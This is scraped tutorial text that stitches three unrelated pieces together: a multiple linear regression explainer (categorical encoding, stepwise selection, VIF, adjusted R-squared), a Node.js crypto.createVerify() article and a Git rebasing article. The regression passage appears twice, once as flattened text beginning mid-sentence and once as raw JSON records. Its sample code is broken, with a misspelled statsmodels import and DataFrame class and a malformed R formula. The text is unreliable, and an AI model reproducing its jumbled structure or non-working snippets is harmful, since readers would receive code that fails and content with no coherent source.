variable and you run another without that x variable, and the coefficients for these models are drastically different.When the t-tests for each of the individual slopes are non-significant, but the overall F-test is significant. This is because multicollinearity causes some variables to seem useless, so lowering the t-stat, but has no effect on the F-statistics which takes an overall view.When your VIF is off the charts is 5 or more When your coefficient (the b in bx) is negative, but you know from common sense and business knowledge that the effect of the variable should be positive. Or when the coefficient is too small for a variable that should have a bigger effect. When you run one model with that x variable and you run another without that x variable, and the coefficients for these models are drastically different. When the t-tests for each of the individual slopes are non-significant, but the overall F-test is significant. This is because multicollinearity causes some variables to seem useless, so lowering the t-stat, but has no effect on the F-statistics which takes an overall view. When your VIF is off the charts is 5 or more VIF : Variance Inflation Factor VIF is a measure of how much the variance of the coefficient derived from the model is inflated by collinearity. It helps detect multicollinearity that you cannot catch just by eyeballing a pairwise correlation plot and even detects strong relations between 3 variables and more. It is calculated by taking the ratio of [the variance of all of the coefficients] divided by [the variance of that one variable’s coefficient when it is the only variable in the model]. VIF = 1 : no correlation between that predictor and the other variables VIF = 4 : Suspicious, needs to be looked into VIF = 5-10 : “Houston, we have a problem.” Look into it or drop the variable. Finding VIF in Python:from statsmodels.stats.outliers_influence import variance_inflation_factory, X = dmatrices('y ~ x1 + x2', dataset, return_type='dataframe')vif_df = pd.Dataframe()vif_df["vif"] = [variance_inflation_factor(X.values, i) for i in range(X.shape[1])]vif_df["features"] = X.columnsprint(vif_df)Finding VIF in R reg <- lm(y ~ x1+x2,x3, data=dataset) summary(reg) VIF(lm(x1 ~ x2+x3, data=dataset)) VIF(lm(x2 ~ x1+x3, data=dataset)) VIF(lm(x3 ~ x2+x1, data=dataset)) We learnt about R Squared in the last post. To recap, it measures how well the regression line fits with the actual results. Let’s dive deeper. Its formula is: R-squared = Explained variation / Total variation Explained Variance = Sum of Squares due to Regression (SSR) [do no confuse with RSS (Residual Sum of Squares) which is also called SSE] Sum of Squares Total (SST) = SSR + SSE (Sum of Squared Errors) You can look at it as SSE being the “Unexplained Variation”. Remember that SSE is the errors between your actual (y) and your predicted (y-hat) Total Variation = SST (Sum of Squares Total). The average squared difference between Each Variable and the Overall Mean of the Variable ( y- ybar). So R-squared essentially looks like this: Now that that’s clarified, let’s check out Adjusted R-Squared. Because your numerator is the SUM of variances, adding more predictors (x variables) will always increase the R-squared, making it inaccurate as the predictors increase. The adjusted R-squared on the other hand, accounts for the increase in number of predictors. n refers to the number of data points (E.g rows in your dataset) k refers to the number of x variables Because of the nature of the equation, the Adjusted R-Squared should always be lower than or equal the R-Squared. A good way to use Adjusted R square is to perhaps run a few iterations of the model with different variables (e.g do a stepwise regression). You can see how the adjusted R squared increases and maybe hits an optimal point before decreasing when more variables are added. You should then keep it at those variables that gave you the optimal adjust R squared. Any variables that are able to predict the outcome variable significantly, and thus improve your accuracy, will lead to a higher Adjusted R-Squared. Take a breather. Congrats on reaching the end of this post! The next one will cover the actual modelling using gretl and python, and more ways of checking accuracy. Till next time!
[ { "code": null, "e": 377, "s": 172, "text": "In this super long post, I cover Multiple Linear Regression describing briefly(lol) how it works and what criteria you need to take note of. So get yourself water and snacks, cause this will take a while." }, { "code": null, "e": 586, "s": 377, "text": "The bulk of the basic concepts were covered in my Simple Linear Regression posts, which can be found here. I had intended to quickly cover MLR in one post, but there’s really too many things to address. Sigh." }, { "code": null, "e": 769, "s": 586, "text": "It’s like when your sister had a baby who was once the sole contributor to all the noise in the house, but then she had a couple more and now all three are contributing to the noise." }, { "code": null, "e": 777, "s": 769, "text": "becomes" }, { "code": null, "e": 939, "s": 777, "text": "The multiple linear regression explains the relationship between one continuous dependent variable (y) and two or more independent variables (x1, x2, x3... etc)." }, { "code": null, "e": 1148, "s": 939, "text": "Note that it says CONTINUOUS dependant variable. Since y is the sum of beta, beta1 x1, beta2 x2 etc etc, the resulting y will be a number, a continuous variable, instead of a “yes”, “no” answer (categorical)." }, { "code": null, "e": 1305, "s": 1148, "text": "For example, with linear regression, I would be trying to find out how much Decibels of noise is being produced, and not if it’s noisy or not (Noisy | Not)." }, { "code": null, "e": 1430, "s": 1305, "text": "To find categorical variables (e.g “yes” or “no”, “1” or “0”), logistic regression would be used. I’ll cover this next time." }, { "code": null, "e": 1484, "s": 1430, "text": "Datasets to try your code on can be found everywhere." }, { "code": null, "e": 1642, "s": 1484, "text": "sklearn has toy datasets for different types of algorithms (regression, classification etc) which are great for practice. Kaggle also has real-life datasets." }, { "code": null, "e": 2061, "s": 1642, "text": "Note that in the wild, when you do encounter a dataset, it is going to be ugly AF. It’s going to have missing values, erroneous entries, wrongly formatted columns, irrelevant variables... and even after cleaning it, maybe your p-values look terrible and your R squared is too low. You’ll need to select good features, try different algorithms, tune your hyperparameters, add a time lag, transform the column’s data...." }, { "code": null, "e": 2255, "s": 2061, "text": "It’s not that straightforward in real-life to run a model, and that’s why people get paid a lot to do this, so that they can fund their scalp treatment to recover from stress-induced hair loss." }, { "code": null, "e": 2438, "s": 2255, "text": "Due to the nature of the regression equation, your x variables have to be continuous as well. Thus, you’ll need to look into changing your categorical variables into continuous ones." }, { "code": null, "e": 2530, "s": 2438, "text": "Continuous variables are simply put, running numbers. Categorical variables are categories." }, { "code": null, "e": 2617, "s": 2530, "text": "It gets slightly confusing when your categorical variables appear continuous at first." }, { "code": null, "e": 2688, "s": 2617, "text": "For example, what if there was a column of zip codes or phone numbers?" }, { "code": null, "e": 2951, "s": 2688, "text": "Every zip code represents a unique address and every phone number is just a unique contact number. Increasing/decreasing this number does not have any meaning — they are merely identifiers with no intrinsic numerical value, and hence, are considered categorical." }, { "code": null, "e": 3051, "s": 2951, "text": "Categorical Variables are also referred to as discrete or qualitative variables. There are 3 types:" }, { "code": null, "e": 3090, "s": 3051, "text": "Nominal : more than 2 types. e.g color" }, { "code": null, "e": 3125, "s": 3090, "text": "Dichotomous: 2 types e.g yes or no" }, { "code": null, "e": 3217, "s": 3125, "text": "Ordinal: more than 2 types, but have a rank/order e.g Below average, Average, Above Average" }, { "code": null, "e": 3327, "s": 3217, "text": "There are several ways to change a categorical data into continuous variables that can be used in regression." }, { "code": null, "e": 3489, "s": 3327, "text": "The simple solution for dichotomous variables would be to change it into binary — “1” means “yes” and “0” means “no” or vice versa. Your label should start at 0." }, { "code": null, "e": 3550, "s": 3489, "text": "Nominal and Ordinal variables are slightly more troublesome." }, { "code": null, "e": 3684, "s": 3550, "text": "Let’s say you have 3 different colours: Red, Blue and Grey. Following the concept above, you label Red as 0, Blue as 1 and Grey as 2." }, { "code": null, "e": 3949, "s": 3684, "text": "The problem with doing this is that it implies that Grey is of a higher level than Red and Blue and Blue is of a higher level that Red, which if you consider all three just colours with equal “value”, none of these colours should be of higher level than the other." }, { "code": null, "e": 4079, "s": 3949, "text": "“Ranking” with labels would work better for Ordinal variables, since they do have a rank and should be given different weightage." }, { "code": null, "e": 4182, "s": 4079, "text": "When facing nominal variables that should not have different weightage, one hot encoding is preferred." }, { "code": null, "e": 4492, "s": 4182, "text": "In order not to give categories that are on an even playing field any unequal values, we use one hot encoding. This is done by creating dummy variables, which means creating more “x”s. These would be fake/dummy variables because they are placeholders for your actual variable and were created by you yourself." }, { "code": null, "e": 4573, "s": 4492, "text": "It’s easy. For every level your variable is, just create a new x for each level." }, { "code": null, "e": 4598, "s": 4573, "text": "Wait... What about Grey?" }, { "code": null, "e": 4821, "s": 4598, "text": "If your variable can only be 3 colours, then you should only be using 2 dummy variables. Grey becomes the reference category, in the case that your X(blue) and X(red) are both 0, then by default the variable would be Grey." }, { "code": null, "e": 4906, "s": 4821, "text": "Does it matter which variable you choose to exclude and use as a reference category?" }, { "code": null, "e": 5065, "s": 4906, "text": "No. But the best practice would be to use the category that happens most often (e.g if 70% of the dataset is grey, then grey would be the reference category)." }, { "code": null, "e": 5239, "s": 5065, "text": "Going back to the column of zip codes, let’s say you have 500 rows of clients, all with their own unique zip codes. Does it make sense to hot encode 500 different zip codes?" }, { "code": null, "e": 5344, "s": 5239, "text": "That’s going to add 500 columns to your dataset, cluttering your model and blessing you with a migraine." }, { "code": null, "e": 5758, "s": 5344, "text": "It is also absolutely pointless since every zip code is unique. It adds no insight to your model because how would you use such information to predict an outcome on new data? If you need to predict the income level of someone living at zip code 323348, how the heck would your model handle that if no such zip code was in your dataset? It has never seen this zip code before and cannot tell you anything about it." }, { "code": null, "e": 5995, "s": 5758, "text": "What you can do is to transform it into something that you could be used to classify future data, such as grouping these zip codes by their areas (this data would not be in the dataset but needs to be from domain knowledge or research)." }, { "code": null, "e": 6234, "s": 5995, "text": "So instead of 500 different zip codes, you get 4 regions, North, South, East or West (OR depending on how specific you want to get, it could be actual areas like Hougang, Yishun, Bedok, Orchard etc. these are names of areas in Singapore)." }, { "code": null, "e": 6376, "s": 6234, "text": "That means if new data comes in where you need to predict the outcome, you can predict the y based on which area the new zip code falls into." }, { "code": null, "e": 6434, "s": 6376, "text": "One thing to always keep in mind is not to label blindly." }, { "code": null, "e": 6456, "s": 6434, "text": "It has to make sense." }, { "code": null, "e": 6698, "s": 6456, "text": "For example, when encoding ordinal variables (categorical variables with rank), you must ensure that the rank value corresponds to the actual significance of each rank (which can also be seen as its relationship with the dependant variable)." }, { "code": null, "e": 6918, "s": 6698, "text": "For example, if you are selling a house, and y = price, while one of the x variables is the floor the apartment is on, encoding the floors as integers make sense if the floors increase in price as it increases in level:" }, { "code": null, "e": 7048, "s": 6918, "text": "However, if the value does not increase accordingly, perhaps one hot encoding and combining the levels would be more appropriate:" }, { "code": null, "e": 7051, "s": 7048, "text": "Or" }, { "code": null, "e": 7100, "s": 7051, "text": "Or if you have no idea what the relationship is:" }, { "code": null, "e": 7246, "s": 7100, "text": "Always ensure that no matter how you transform your categorical variables, make sure you look back at it and ask yourself “does that make sense?”" }, { "code": null, "e": 7340, "s": 7246, "text": "Sometimes there is no right answer, so the question then becomes “does that make more sense?”" }, { "code": null, "e": 7514, "s": 7340, "text": "which might potentially become, “but what makes any sense?” and lead into “what is sense?” which becomes “what is?” and then segue into a week spent in existential nihilism." }, { "code": null, "e": 7544, "s": 7514, "text": "Bottom line is: Know Thy Data" }, { "code": null, "e": 7741, "s": 7544, "text": "Having too many variables could potentially cause your model to become less accurate, especially if certain variables have no effect on the outcome or have a significant effect on other variables." }, { "code": null, "e": 8158, "s": 7741, "text": "Let’s take for example the 3 babies screaming. If I were to model my regression equation to find out the decibels of noise being produced based on these 4 variables = baby 1, baby 2, baby 3, lamp (on or off) , it would not be a good model. This is because my spidey senses are telling me that a lamp should not contribute to noise, so any possible correlation between lamp and noise would be spurious and inaccurate." }, { "code": null, "e": 8232, "s": 8158, "text": "Basic step of Feature Selection: Use your Common and/or Business Sense(s)" }, { "code": null, "e": 8552, "s": 8232, "text": "One other way to select features is to use the p-values. As we last discussed, p-values tell you how statistically significant the variable is. Removing variables with high p-values can cause your accuracy/R squared to increase, and even the p-values of the other variables to increase as well — and that’s a good sign." }, { "code": null, "e": 8647, "s": 8552, "text": "This action of omitting variables is part of stepwise regression. There are 3 ways to do this:" }, { "code": null, "e": 9041, "s": 8647, "text": "Forward Selection: Start with 0. Run the model over and over, trying each variable. Find the variable that gives the best metric (E.g p-values, Adjusted R-squared, SSE, % accuracy) and stick with it. Run model again with the chosen variable, trying one of the remaining variables at each time and sticking with the best one. Repeat process until the adding does not improve the model any more." }, { "code": null, "e": 9342, "s": 9041, "text": "Backward Elimination: Start with all variables. Try model out multiple times, excluding one variable at each time. Remove variable that causes the model to improve the most when it is left out. Repeat process without the removed variable, until the metric(s) you are judging on can no longer improve." }, { "code": null, "e": 9576, "s": 9342, "text": "Bidirectional Elimination: Do a forward selection, but then do backward eliminations as well at some stages. So you can be at a stage where you’ve added X1, X2, X5 and X8, then do elimination by taking out X2. This is a good example." }, { "code": null, "e": 9787, "s": 9576, "text": "There are R and Python packages created by amazing people that automate these processes to choose the “best model” based on a particular metric (e.g adjusted R Squared or AIC or p-values).Here are some I found." }, { "code": null, "e": 10068, "s": 9787, "text": "NOTE: Stepwise regression is a quick and fast way to get better scoring models, especially when you’re running simple models. It’s widely used, but also widely criticised as being inaccurate. I’ve always been taught to use stepwise, so I would love to hear your opinions about it." }, { "code": null, "e": 10244, "s": 10068, "text": "An alternative to stepwise regression would be the LASSO (Least Absolute Shrinkage and Selection Operator) method, which I will cover next time. Or you can read about it here." }, { "code": null, "e": 10388, "s": 10244, "text": "Checking for collinearity helps you get rid of variables that are skewing your data by having a significant relationship with another variable." }, { "code": null, "e": 10526, "s": 10388, "text": "Correlation between variables describe the relationship between two variables. If they are extremely correlated, then they are collinear." }, { "code": null, "e": 11010, "s": 10526, "text": "Autocorrelation occurs when a variable’s data affects another instance of that same variable (same column, different row). Linear regression only works if there is little or no autocorrelation in the dataset, and each instance is independent of each other. If instances are autocorrelated then your residuals are not independent from each other, and will show a pattern. This usually occurs in time series datasets, so I will go into more details when I cover Time Series Regression." }, { "code": null, "e": 11368, "s": 11010, "text": "Multicollinearity exists when two or more of the predictors (x variables) in a regression model are moderately or highly correlated (different column). When one of our predictors is able to strongly predict another predictor or have weird relationships with each other (maybe x2 = x3 or x2 = 2(x3) + x4), then your regression equation is going to be a mess." }, { "code": null, "e": 11604, "s": 11368, "text": "Why is multicollinearity an issue with regression? Well, the regression equation is the best fit line to represent the effects of your predictors and the dependant variable, and does not include the effects of one predictor on another." }, { "code": null, "e": 11833, "s": 11604, "text": "Having high collinearity (correlation of 1.00) between predictors will affect your coefficients and the accuracy, plus its ability to reduce the SSE (sum of squared errors — that thing you need to minimise with your regression)." }, { "code": null, "e": 12011, "s": 11833, "text": "The simplest method to detect collinearity would be to plot it out in graphs or to view a correlation matrix to check out pairwise correlation (correlation between 2 variables)." }, { "code": null, "e": 12123, "s": 12011, "text": "If you have two variables that are highly correlated, your best course of action is to just remove one of them." }, { "code": null, "e": 12835, "s": 12123, "text": "When your coefficient (the b in bx) is negative, but you know from common sense and business knowledge that the effect of the variable should be positive. Or when the coefficient is too small for a variable that should have a bigger effect.When you run one model with that x variable and you run another without that x variable, and the coefficients for these models are drastically different.When the t-tests for each of the individual slopes are non-significant, but the overall F-test is significant. This is because multicollinearity causes some variables to seem useless, so lowering the t-stat, but has no effect on the F-statistics which takes an overall view.When your VIF is off the charts is 5 or more" }, { "code": null, "e": 13076, "s": 12835, "text": "When your coefficient (the b in bx) is negative, but you know from common sense and business knowledge that the effect of the variable should be positive. Or when the coefficient is too small for a variable that should have a bigger effect." }, { "code": null, "e": 13230, "s": 13076, "text": "When you run one model with that x variable and you run another without that x variable, and the coefficients for these models are drastically different." }, { "code": null, "e": 13505, "s": 13230, "text": "When the t-tests for each of the individual slopes are non-significant, but the overall F-test is significant. This is because multicollinearity causes some variables to seem useless, so lowering the t-stat, but has no effect on the F-statistics which takes an overall view." }, { "code": null, "e": 13550, "s": 13505, "text": "When your VIF is off the charts is 5 or more" }, { "code": null, "e": 13582, "s": 13550, "text": "VIF : Variance Inflation Factor" }, { "code": null, "e": 13862, "s": 13582, "text": "VIF is a measure of how much the variance of the coefficient derived from the model is inflated by collinearity. It helps detect multicollinearity that you cannot catch just by eyeballing a pairwise correlation plot and even detects strong relations between 3 variables and more." }, { "code": null, "e": 14048, "s": 13862, "text": "It is calculated by taking the ratio of [the variance of all of the coefficients] divided by [the variance of that one variable’s coefficient when it is the only variable in the model]." }, { "code": null, "e": 14120, "s": 14048, "text": "VIF = 1 : no correlation between that predictor and the other variables" }, { "code": null, "e": 14166, "s": 14120, "text": "VIF = 4 : Suspicious, needs to be looked into" }, { "code": null, "e": 14244, "s": 14166, "text": "VIF = 5-10 : “Houston, we have a problem.” Look into it or drop the variable." }, { "code": null, "e": 14725, "s": 14244, "text": "Finding VIF in Python:from statsmodels.stats.outliers_influence import variance_inflation_factory, X = dmatrices('y ~ x1 + x2', dataset, return_type='dataframe')vif_df = pd.Dataframe()vif_df[\"vif\"] = [variance_inflation_factor(X.values, i) for i in range(X.shape[1])]vif_df[\"features\"] = X.columnsprint(vif_df)Finding VIF in R reg <- lm(y ~ x1+x2,x3, data=dataset) summary(reg) VIF(lm(x1 ~ x2+x3, data=dataset)) VIF(lm(x2 ~ x1+x3, data=dataset)) VIF(lm(x3 ~ x2+x1, data=dataset))" }, { "code": null, "e": 14869, "s": 14725, "text": "We learnt about R Squared in the last post. To recap, it measures how well the regression line fits with the actual results. Let’s dive deeper." }, { "code": null, "e": 14885, "s": 14869, "text": "Its formula is:" }, { "code": null, "e": 14935, "s": 14885, "text": "R-squared = Explained variation / Total variation" }, { "code": null, "e": 15071, "s": 14935, "text": "Explained Variance = Sum of Squares due to Regression (SSR) [do no confuse with RSS (Residual Sum of Squares) which is also called SSE]" }, { "code": null, "e": 15134, "s": 15071, "text": "Sum of Squares Total (SST) = SSR + SSE (Sum of Squared Errors)" }, { "code": null, "e": 15278, "s": 15134, "text": "You can look at it as SSE being the “Unexplained Variation”. Remember that SSE is the errors between your actual (y) and your predicted (y-hat)" }, { "code": null, "e": 15426, "s": 15278, "text": "Total Variation = SST (Sum of Squares Total). The average squared difference between Each Variable and the Overall Mean of the Variable ( y- ybar)." }, { "code": null, "e": 15468, "s": 15426, "text": "So R-squared essentially looks like this:" }, { "code": null, "e": 15531, "s": 15468, "text": "Now that that’s clarified, let’s check out Adjusted R-Squared." }, { "code": null, "e": 15701, "s": 15531, "text": "Because your numerator is the SUM of variances, adding more predictors (x variables) will always increase the R-squared, making it inaccurate as the predictors increase." }, { "code": null, "e": 15794, "s": 15701, "text": "The adjusted R-squared on the other hand, accounts for the increase in number of predictors." }, { "code": null, "e": 15859, "s": 15794, "text": "n refers to the number of data points (E.g rows in your dataset)" }, { "code": null, "e": 15897, "s": 15859, "text": "k refers to the number of x variables" }, { "code": null, "e": 16011, "s": 15897, "text": "Because of the nature of the equation, the Adjusted R-Squared should always be lower than or equal the R-Squared." }, { "code": null, "e": 16369, "s": 16011, "text": "A good way to use Adjusted R square is to perhaps run a few iterations of the model with different variables (e.g do a stepwise regression). You can see how the adjusted R squared increases and maybe hits an optimal point before decreasing when more variables are added. You should then keep it at those variables that gave you the optimal adjust R squared." }, { "code": null, "e": 16518, "s": 16369, "text": "Any variables that are able to predict the outcome variable significantly, and thus improve your accuracy, will lead to a higher Adjusted R-Squared." }, { "code": null, "e": 16578, "s": 16518, "text": "Take a breather. Congrats on reaching the end of this post!" }, { "code": null, "e": 16683, "s": 16578, "text": "The next one will cover the actual modelling using gretl and python, and more ways of checking accuracy." } ]
Node.js crypto.createVerify() Method
11 Oct, 2021 The crypto.createVerify() method is used to create a Verify object that uses the stated algorithm. Moreover, you can use crypto.getHashes() to access the names of all the available signing algorithms. Syntax: crypto.createVerify( algorithm, options ) Parameters: This method accept two parameters as mentioned above and described below: algorithm: It is a string type value. A Sign instance can be created by applying the name of a signature algorithms, like ‘RSA-SHA256’, in place of a digest algorithms. options: It is an optional parameter that is used to control stream behavior. It returns an object. Return Value: It returns Verify object. Below examples illustrate the use of crypto.createVerify() method in Node.js: Example 1: // Node.js program to demonstrate the // crypto.createVerify() method // Including crypto moduleconst crypto = require('crypto'); // Creating verify object with its algoconst verify = crypto.createVerify('SHA256'); // Returns the 'Verify' objectconsole.log(verify); Output: Verify { _handle: {}, _writableState: WritableState { objectMode: false, highWaterMark: 16384, finalCalled: false, needDrain: false, ending: false, ended: false, finished: false, destroyed: false, decodeStrings: true, defaultEncoding: 'utf8', length: 0, writing: false, corked: 0, sync: true, bufferProcessing: false, onwrite: [Function: bound onwrite], writecb: null, writelen: 0, bufferedRequest: null, lastBufferedRequest: null, pendingcb: 0, prefinished: false, errorEmitted: false, emitClose: true, autoDestroy: false, bufferedRequestCount: 0, corkedRequestsFree: { next: null, entry: null, finish: [Function: bound onCorkedFinish] } }, writable: true, domain: null, _events: [Object: null prototype] {}, _eventsCount: 0, _maxListeners: undefined } Example 2: // Node.js program to demonstrate the // crypto.createVerify() method // Including crypto moduleconst crypto = require('crypto'); // Creating verify object with its algoconst verify = crypto.createVerify('SHA256'); // Writing data to be signed and verifiedverify.write('some text to sign'); // Calling end methodverify.end(); // Beginning public key const l1 = "-----BEGIN PUBLIC KEY-----\n" // Encrypted data const l2 = "MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEXIvPbzLjaPLd8jgiv1TL/X8PXpJNgDkGRj9U9Lcx1yKURpQFVavcMkfWyO8r7JlZNMax0JKfLZUM1IePRjHlFw==" // Ending public key const l3 = "\n-----END PUBLIC KEY-----" // Constructing public key const publicKey = l1 + l2 + l3 // Signature to be verified const signature = "MEYCIQCPfWhpzxMqu3gZWflBm5V0aetgb2/S+SGyGcElaOjgdgIhALaD4lbxVwa8HUUBFOLz+CGvIioDkf9oihSnXHCqh8yV"; // Prints true if verified else false console.log(verify.verify(publicKey, signature)); Output: false Reference: https://nodejs.org/api/crypto.html#crypto_crypto_createverify_algorithm_options Node.js-crypto-module Node.js Web Technologies Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
[ { "code": null, "e": 28, "s": 0, "text": "\n11 Oct, 2021" }, { "code": null, "e": 229, "s": 28, "text": "The crypto.createVerify() method is used to create a Verify object that uses the stated algorithm. Moreover, you can use crypto.getHashes() to access the names of all the available signing algorithms." }, { "code": null, "e": 237, "s": 229, "text": "Syntax:" }, { "code": null, "e": 279, "s": 237, "text": "crypto.createVerify( algorithm, options )" }, { "code": null, "e": 365, "s": 279, "text": "Parameters: This method accept two parameters as mentioned above and described below:" }, { "code": null, "e": 534, "s": 365, "text": "algorithm: It is a string type value. A Sign instance can be created by applying the name of a signature algorithms, like ‘RSA-SHA256’, in place of a digest algorithms." }, { "code": null, "e": 634, "s": 534, "text": "options: It is an optional parameter that is used to control stream behavior. It returns an object." }, { "code": null, "e": 674, "s": 634, "text": "Return Value: It returns Verify object." }, { "code": null, "e": 752, "s": 674, "text": "Below examples illustrate the use of crypto.createVerify() method in Node.js:" }, { "code": null, "e": 763, "s": 752, "text": "Example 1:" }, { "code": "// Node.js program to demonstrate the // crypto.createVerify() method // Including crypto moduleconst crypto = require('crypto'); // Creating verify object with its algoconst verify = crypto.createVerify('SHA256'); // Returns the 'Verify' objectconsole.log(verify);", "e": 1032, "s": 763, "text": null }, { "code": null, "e": 1040, "s": 1032, "text": "Output:" }, { "code": null, "e": 1969, "s": 1040, "text": "Verify {\n _handle: {},\n _writableState:\n WritableState {\n objectMode: false,\n highWaterMark: 16384,\n finalCalled: false,\n needDrain: false,\n ending: false,\n ended: false,\n finished: false,\n destroyed: false,\n decodeStrings: true,\n defaultEncoding: 'utf8',\n length: 0,\n writing: false,\n corked: 0,\n sync: true,\n bufferProcessing: false,\n onwrite: [Function: bound onwrite],\n writecb: null,\n writelen: 0,\n bufferedRequest: null,\n lastBufferedRequest: null,\n pendingcb: 0,\n prefinished: false,\n errorEmitted: false,\n emitClose: true,\n autoDestroy: false,\n bufferedRequestCount: 0,\n corkedRequestsFree:\n { next: null,\n entry: null,\n finish: [Function: bound onCorkedFinish] } },\n writable: true,\n domain: null,\n _events: [Object: null prototype] {},\n _eventsCount: 0,\n _maxListeners: undefined }\n" }, { "code": null, "e": 1980, "s": 1969, "text": "Example 2:" }, { "code": "// Node.js program to demonstrate the // crypto.createVerify() method // Including crypto moduleconst crypto = require('crypto'); // Creating verify object with its algoconst verify = crypto.createVerify('SHA256'); // Writing data to be signed and verifiedverify.write('some text to sign'); // Calling end methodverify.end(); // Beginning public key const l1 = \"-----BEGIN PUBLIC KEY-----\\n\" // Encrypted data const l2 = \"MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEXIvPbzLjaPLd8jgiv1TL/X8PXpJNgDkGRj9U9Lcx1yKURpQFVavcMkfWyO8r7JlZNMax0JKfLZUM1IePRjHlFw==\" // Ending public key const l3 = \"\\n-----END PUBLIC KEY-----\" // Constructing public key const publicKey = l1 + l2 + l3 // Signature to be verified const signature = \"MEYCIQCPfWhpzxMqu3gZWflBm5V0aetgb2/S+SGyGcElaOjgdgIhALaD4lbxVwa8HUUBFOLz+CGvIioDkf9oihSnXHCqh8yV\"; // Prints true if verified else false console.log(verify.verify(publicKey, signature));", "e": 2938, "s": 1980, "text": null }, { "code": null, "e": 2946, "s": 2938, "text": "Output:" }, { "code": null, "e": 2953, "s": 2946, "text": "false\n" }, { "code": null, "e": 3044, "s": 2953, "text": "Reference: https://nodejs.org/api/crypto.html#crypto_crypto_createverify_algorithm_options" }, { "code": null, "e": 3066, "s": 3044, "text": "Node.js-crypto-module" }, { "code": null, "e": 3074, "s": 3066, "text": "Node.js" }, { "code": null, "e": 3091, "s": 3074, "text": "Web Technologies" } ]
Rebasing of branches in Git
03 May, 2020 Branching means to split from the master branch so that you can work separately without affecting the main code and other developers. On creating a Git repository, by default, we are assigned the master branch. As we start making commits, this master branch keeps updating and points to the last commit made to the repository.Branching in Git looks like this: Rebasing in Git is a process of integrating a series of commits on top of another base tip. It takes all the commits of a branch and appends them to commits of a new branch. Git rebasing looks as follows: The technical syntax of rebase command is: git rebase [-i | –interactive] [ options ] [–exec cmd] [–onto newbase | –keep-base] [upstream [branch]] Usage:The main aim of rebasing is to maintain a progressively straight and cleaner project history. Rebasing gives rise to a perfectly linear project history which can follow the end commit of the feature all the way to the beginning of the project without even forking. This makes it easier to navigate your project. Git rebase is in interactive mode when the rebase command accepts an — i argument. This stands for Interactive. Without any arguments, the command runs in Standard mode. In order to achieve standard rebasing, we follow the following command: git rebase master branch_x where branch_x is the branch we want to rebase The above command is equivalent to the following command and will automatically take the commits in your current working branch and apply them to the head of the branch which will be mentioned: git rebase master Whereas, in Interactive rebasing, you can alter individual commits as they are moved to the new branch. It offers you complete control over the branch’s commit history.In order to achieve interactive rebasing, we follow the following command: git checkout branch_x git rebase -i master This command lists all the commits which are about to be moved and asks for rebasing all commits individually and then rebase them according to the choices you entered. This gives you complete control over what your project history looks like. Both merge and rebase are used to merge branches but the difference lies in the commit history after you integrate one branch into another. In Git merging, commits from all the developers who made commits will be there in the git log. This is really good for beginners cause the head can be rolled back to commit from any of the developers. Whereas, in git rebase, commit from only a single developer will be stamped in the git log. Advanced developers prefer this cause it makes the commit history linear and clean.The command for merging is given as: git merge branch_x master This creates a new commit in the merged branch that ties together the histories of both branches, giving you a branch structure that looks like this as opposed to rebasing what we saw above: Note: After performing rebasing, we are by default on the last commit of the rebased branch. Picked Git Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Git - Difference Between Git Fetch and Git Pull How to Set Upstream Branch on Git? How to Push Git Branch to Remote? How to Export Eclipse projects to GitHub? Merge Conflicts and How to handle them How to Add Git Credentials in Eclipse? What is README.md File? Git - Origin Master How to Add Videos on README .md File in a GitHub Repository? Git - Cherry Pick
[ { "code": null, "e": 28, "s": 0, "text": "\n03 May, 2020" }, { "code": null, "e": 388, "s": 28, "text": "Branching means to split from the master branch so that you can work separately without affecting the main code and other developers. On creating a Git repository, by default, we are assigned the master branch. As we start making commits, this master branch keeps updating and points to the last commit made to the repository.Branching in Git looks like this:" }, { "code": null, "e": 593, "s": 388, "text": "Rebasing in Git is a process of integrating a series of commits on top of another base tip. It takes all the commits of a branch and appends them to commits of a new branch. Git rebasing looks as follows:" }, { "code": null, "e": 636, "s": 593, "text": "The technical syntax of rebase command is:" }, { "code": null, "e": 740, "s": 636, "text": "git rebase [-i | –interactive] [ options ] [–exec cmd] [–onto newbase | –keep-base] [upstream [branch]]" }, { "code": null, "e": 1058, "s": 740, "text": "Usage:The main aim of rebasing is to maintain a progressively straight and cleaner project history. Rebasing gives rise to a perfectly linear project history which can follow the end commit of the feature all the way to the beginning of the project without even forking. This makes it easier to navigate your project." }, { "code": null, "e": 1228, "s": 1058, "text": "Git rebase is in interactive mode when the rebase command accepts an — i argument. This stands for Interactive. Without any arguments, the command runs in Standard mode." }, { "code": null, "e": 1300, "s": 1228, "text": "In order to achieve standard rebasing, we follow the following command:" }, { "code": null, "e": 1375, "s": 1300, "text": "git rebase master branch_x\n\nwhere branch_x is the branch we want to rebase" }, { "code": null, "e": 1569, "s": 1375, "text": "The above command is equivalent to the following command and will automatically take the commits in your current working branch and apply them to the head of the branch which will be mentioned:" }, { "code": null, "e": 1587, "s": 1569, "text": "git rebase master" }, { "code": null, "e": 1830, "s": 1587, "text": "Whereas, in Interactive rebasing, you can alter individual commits as they are moved to the new branch. It offers you complete control over the branch’s commit history.In order to achieve interactive rebasing, we follow the following command:" }, { "code": null, "e": 1873, "s": 1830, "text": "git checkout branch_x\ngit rebase -i master" }, { "code": null, "e": 2117, "s": 1873, "text": "This command lists all the commits which are about to be moved and asks for rebasing all commits individually and then rebase them according to the choices you entered. This gives you complete control over what your project history looks like." }, { "code": null, "e": 2670, "s": 2117, "text": "Both merge and rebase are used to merge branches but the difference lies in the commit history after you integrate one branch into another. In Git merging, commits from all the developers who made commits will be there in the git log. This is really good for beginners cause the head can be rolled back to commit from any of the developers. Whereas, in git rebase, commit from only a single developer will be stamped in the git log. Advanced developers prefer this cause it makes the commit history linear and clean.The command for merging is given as:" }, { "code": null, "e": 2696, "s": 2670, "text": "git merge branch_x master" }, { "code": null, "e": 2887, "s": 2696, "text": "This creates a new commit in the merged branch that ties together the histories of both branches, giving you a branch structure that looks like this as opposed to rebasing what we saw above:" }, { "code": null, "e": 2980, "s": 2887, "text": "Note: After performing rebasing, we are by default on the last commit of the rebased branch." }, { "code": null, "e": 2987, "s": 2980, "text": "Picked" }, { "code": null, "e": 2991, "s": 2987, "text": "Git" }, { "code": null, "e": 3089, "s": 2991, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 3137, "s": 3089, "text": "Git - Difference Between Git Fetch and Git Pull" }, { "code": null, "e": 3172, "s": 3137, "text": "How to Set Upstream Branch on 